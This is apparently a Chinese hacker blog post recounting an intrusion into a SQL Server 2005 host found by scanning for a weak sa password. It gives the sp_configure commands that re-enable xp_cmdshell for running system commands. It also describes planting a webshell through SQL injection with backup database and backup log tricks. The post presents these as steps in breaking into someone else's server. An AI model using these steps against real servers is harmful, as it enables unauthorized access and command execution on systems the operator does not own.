入侵SQL Server 2005

 

以前就听说SQL Server 2005的安全性如何如何变态，今天正好遇到了台扫出sa弱口令的SQL Server 2005主机，登录进去发现执用不了 xp_cmdshell，这是因为在默认情况下， xp_cmdshell 选项在新安装SQL Server 2005上处于禁用状态，但是可以通过使用外围应用配置器工具或运行 sp_configure 系统存储过程来启用它，如下面的代码示例所示：

-- To allow advanced options to be changed.
EXEC sp_configure ' show advanced options ' , 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure ' xp_cmdshell ' , 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO

如果是注入想要执行xp_cmdshell应该怎么办呢？我们可以先导出个WEBSHELL，然后利用这个WEBSHELL的执行SQL语句功能执行这个SQL脚本就可以了，但是在实验中发现backup log无法使用，出错提示“当前没有数据库备份”（大致这意思），于是我用backup database备份了一个数据库然后再用backup log就成功了，看来SQL 2005确实要比2000困难。做到这里突然又想到一个困难，如果存在找不到web物理路径或SQL Server 2005与WEB不在同台服务器等情况因而得不到WEBSHELL怎么办？接着在实验中又发现只要一条语句就可以直接执行命令，看来只要花点点时间研究一下SQL Server 2005，那么便会发现它并不是想像当中那么坚固。时间关系以后再做更多有关SQL Server 2005实验。